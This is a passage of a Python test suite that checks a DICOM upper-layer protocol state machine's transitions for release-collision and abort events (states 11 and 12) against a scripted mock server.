            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt15'
]
def test_evt16(self):
"""Test Sta11 + Evt16."""
# Sta11 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_abort),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt16',
]
def test_evt17(self):
"""Test Sta11 + Evt17."""
# Sta11 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt17',
]
def test_evt18(self):
"""Test Sta11 + Evt18."""
# Sta11 + Evt18 -> <ignore> -> Sta11
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt18',
]
def test_evt19(self):
"""Test Sta11 + Evt19."""
# Sta11 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt19',
]
class TestState12(TestStateBase):
"""Tests for State 12: Release collision acc - awaiting A-RELEASE (rp)"""
def test_evt01(self):
"""Test Sta12 + Evt1."""
# Sta12 + Evt1 -> <ignore> -> Sta12
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta12 + Evt2."""
# Sta12 + Evt2 -> <ignore> -> Sta12
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta12 + Evt3."""
# Sta12 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_ac), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt3', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta12 + Evt4."""
# Sta12 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rj), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt4', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta12 + Evt5."""
# Sta12 + Evt5 -> <ignore> -> Sta12
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta12 + Evt6."""
# Sta12 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rq), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt6', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta12 + Evt7."""
# Sta12 + Evt7 -> <ignore> -> Sta12
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt7'
]
def test_evt08(self):
"""Test Sta12 + Evt8."""
# Sta12 + Evt8 -> <ignore> -> Sta12
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt8'
]
def test_evt09(self):
"""Test Sta12 + Evt9."""
# Sta12 + Evt9 -> <ignore> -> Sta12
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt9'
]
def test_evt10(self):
"""Test Sta12 + Evt10."""
# Sta12 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', p_data_tf), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt10', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta12 + Evt11."""
# Sta12 + Evt11 -> <ignore> -> Sta12
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt11'
]
def test_evt12(self):
"""Test Sta12 + Evt12."""
# Sta12 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rq), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt12', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta12 + Evt13."""
        # Sta12 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rp), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt13', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta12 + Evt14."""
        # Sta12 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Issue A-RELEASE-RP PDU and start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None), # recv a-release-rp
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt14', 'AR-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt14'
]
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta12 + Evt15."""
# Sta12 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt15', 'AA-1'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta12 + Evt16."""
# Sta12 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_abort), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt16', 'AA-3'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt16'
]
def test_evt17(self):
"""Test Sta12 + Evt17."""
# Sta12 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt17', 'AA-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt17'
]
def test_evt18(self):
"""Test Sta12 + Evt18."""
# Sta12 + Evt18 -> <ignore> -> Sta12
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt18'
]
def test_evt19(self):
"""Test Sta12 + Evt19."""
# Sta12 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
